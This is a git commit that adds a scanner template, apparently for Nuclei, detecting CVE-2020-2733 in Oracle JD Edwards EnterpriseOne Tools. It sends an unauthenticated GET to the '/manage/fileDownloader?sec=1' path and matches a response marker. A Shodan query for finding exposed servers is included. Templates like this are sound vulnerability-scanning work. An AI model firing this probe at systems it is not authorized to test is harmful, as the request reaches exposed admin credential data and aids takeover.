Create CVE-2020-2733.yaml

2022-09-21 15:40:52 +05:30 · 2022-09-21 15:40:52 +05:30 · 2ce6d9aa04
parent a0aa8d4438
commit 2ce6d9aa04
1 changed files with 38 additions and 0 deletions
--- a/cves/2020/CVE-2020-2733.yaml
+++ b/cves/2020/CVE-2020-2733.yaml
@ -0,0 +1,38 @@
+id: CVE-2020-2733
+
+info:
+  name: JD Edwards EnterpriseOne Tools admin password not adequately protected
+  author: DhiyaneshDk,pussycat0x
+  severity: critical
+  description: Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in takeover of JD Edwards EnterpriseOne Tools.
+  reference:
+    - https://redrays.io/cve-2020-2733-jd-edwards/
+    - https://www.oracle.com/security-alerts/cpuapr2020.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-2733
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2733
+  metadata:
+    verified: true
+    shodan-query: product:"Oracle WebLogic Server"
+  tags: cve,cve2020,oracle,weblogic
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/manage/fileDownloader?sec=1'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'ACHCJK'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200